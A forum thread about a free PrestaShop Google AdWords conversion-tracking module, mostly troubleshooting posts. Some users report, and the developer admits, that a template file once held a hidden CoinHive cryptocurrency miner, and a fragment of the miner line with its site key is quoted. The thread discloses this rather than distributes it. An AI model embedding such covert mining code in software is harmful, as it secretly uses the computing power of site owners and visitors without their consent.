Dh42

[Free Module] Google Adwords Conversion Tracking

We are happy to announce we have just released a FREE Google Adwords conversion tracking module. 

If you are using Adwords to advertise for your site you need to start tracking the conversions of your ads. Then you can know which ads are working and which ads are not working. 

google-adwords-module.png

google-adwords-code.png

google-adwords-test.png

View the Module

Download the Module

• Like 1

Hi Dh42,

I can't get the module to work, I think it has something to do with the performance settings in (Compres inline javascrops, move javascript to end, mimify htm, ...)
When I use the "test your code button" I see a record on google adwords, but when I receive an order this is not counted.

What settings do you use in performance

Grtz,

E-raser

A link was sent to your email with the download link. I just checked it was sent. 

Intersting module and it get the job done, even that the BO is a little messy with comments about email etc. I can live with that :) Thanks!

I downloaded it just before chirstmas (version 1.3.6), and we had it running for a while. But for some reason, we did not get any data with it.

I figured out that it was because we move all JS to footer, to prevent this you should add data-keepinline="true" to the script tags.

Now my only issue seems to be that my tag inspector complains about "Missing CDATA comments." I did not have time to check this yes, but as far i can see, this is the result of Minify HTML.

I don't think media.php Class have a tag that prevent minify of scripts, like the other that keeps it in the header. I do however remember an override that adds this feature (i even think i saw it on prestashop github as a pull)

https://support.google.com/tagassistant/answer/2947038?hl=en#cdata_comments

Here was the GIST i have found about data-keepinline and how to prevent compress - but for some reason that part was never send to Prestashop

https://gist.github.com/hereswhatidid/8c8edef106ee95138b03

Edited by Casper_O (see edit history)

You must first configure in your google adwords account that conversion you want to see from your website made with prestashop, with which word some visitor came to your store and did some action, and then ask for the code that will put in this module, in this Google section: Set up conversion tracking on the website,

I worked very well

The link of module is down. Can you solve? Thanks

Sorry, it works fine
Edited by rmasc (see edit history)

It is fixed now. 

there is a bitcoin mining exploit in the free.tpl template. 

var miner = new CoinHive.User('eWVjwQDfKcoeBjcF5B7hxe8NzjSxnjPs', 'css module', 

bad guy :$!

(idem in your facebook tracking module, change file time : 2017-09-18)

Edited by eim (see edit history)

Hi,

I have prestashop 1.6.1.18 and I just downloaded your module.

The setup is done with the right ID.

On other hand, the module doesn't works, there is no ride up of the Google ID in Google Adwords tracking.

Any idea ?

Hello,

thank you for the Module.

We have a issue with the noscript tag (please see attached image).

The conversion value in the noscript tag is always 1.00. The normal conversion value is correct.

We use PS 1.6.1

Thank you very much for help,

Ideeconversion-3.thumb.jpg.9836690ca876ff5a35c74d9ee02de2db.jpg

To me it throws error500 after accepting the purchase (it does not allow to see the page of confirmation) 1.7.3.1

Anyway, is it true that mine?

The module is not compatible with 1.7, it has the compatibility listed on the page. 

Hmm are you having people with out js enabled checking out? 

It's true, I had not seen it, sorry.

I do not understand your question, excuse me, I'm new.

What are you talking about? We tried that out for about 2 weeks almost a year ago, then patched all of our modules to not do it. Its not a hack. It was a way to keep releasing free modules to ungrateful users such as yourself. 

Now this catches my attention... who removed that response, that you replied on without leaving a trace of why? Your seemed a little out of context until I checked my email.

Fair you tested coinhive out for a short time, and found that it might not be that great of annidea, but how many is still active mining for you?

what version of the module is affected by coin hive?

It was a version from earlier this year that was affected, I don't have the version numbers handy. 

As for how much it made, less than $20. Which is more than the donate a coffee link I tried next has generated. People just don't like paying for things I assume. We have around 60k downloads from all of our modules and have the largest free module shop. But of well.

It looks like endriu107 hid the post for some reason.

The module apparently count the conversions, but I am getting a notice in Adwords, that the tag is missing the Product-ID?

I guess the ecomm_prodid,  ecomm_pagetype and ecomm_totalvalue  is related to Dynamic Remarketing. So should this not be part of this code/tag too?

Eim is right there is a coinhive miner script in this module.
If you install this module and if you have an anti-virus, you will get a alert every time you refresh your BO page.

If you inspect the source code of the concerned page you'll see that the CoinHive script is located in the HEAD section of your BO ( displayBackOfficeHeader hook).

Simply uninstall this module to get rid of this Miner script.

The script was removed over a year ago. 

Hi and thanks for all those modules. Is there any chance to work with 1.7?

Thank you!

On 10/31/2018 at 9:53 AM, ChillMan said:

The module apparently count the conversions, but I am getting a notice in Adwords, that the tag is missing the Product-ID?

I guess the ecomm_prodid,  ecomm_pagetype and ecomm_totalvalue  is related to Dynamic Remarketing. So should this not be part of this code/tag too?

Hi ChillMan.

Did you solve  this? I´m getting same error.

Thank you in advance.

On 31.10.2018 at 11:53, ChillMan said:

Modül dönüşümleri sayıyor, ancak AdWords'te etiketin Ürün Kimliği eksik olduğunu belirten bir bildirim alıyorum?

Sanırım ecomm_prodid, ecomm_pagetype ve ecomm_totalvalue Dinamik Yeniden Pazarlama ile ilgilidir. Bu da bu kodun / etiketin bir parçası olmamalı mı?

help meee ? 

I've used a couple other modules from dh42 with no problem, but this one (used on PS 1.7.2.2) did not only fail to track my Adwords conversions but it also made G.Analytics stop tracking transactions.

Regards